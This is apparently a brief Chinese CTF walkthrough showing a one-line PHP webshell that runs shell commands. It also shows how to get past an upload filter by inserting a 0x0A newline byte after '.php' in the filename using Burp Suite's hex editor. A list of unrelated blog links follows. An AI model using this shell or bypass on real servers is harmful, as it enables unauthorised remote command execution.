Web页面:
新建一个一句话木马:
0.php
<?php system($_GET[0]); ?>上传木马, burpsuite 抓包。
直接上传是回显 bad file。
我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。
send 后,我们访问一下。发现木马上传成功。
相关推荐
qinyia18 小时前
WisdomSSH解决NFS服务因“RPC fragment too large“导致的性能警告松涛和鸣19 小时前
22、双向链表作业实现与GDB调试实战天宇&嘘月1 天前
Nginx的https搭建_星辰大海乀1 天前
IP 协议屿行屿行1 天前
【Linux】Socket编程(基于实际工程分析)Evan芙1 天前
Rocky Linux 9 网卡改名及静态IP地址配置完整步骤HCIE考证研究所1 天前
最全网安证书大盘点,真不是什么都适合你Brianna Home1 天前
[鸿蒙2025领航者闯关] 鸿蒙 6.0 星盾安全架构 + AI 防窥:金融级支付安全实战与深度踩坑实录Slow菜鸟1 天前
Java开发规范(八)| 安全规范—企业级应用的“架构级底线”不过普通话一乙不改名1 天前
Linux 网络收包的进阶之路:从普通 socket 到 AF_XDP 零拷贝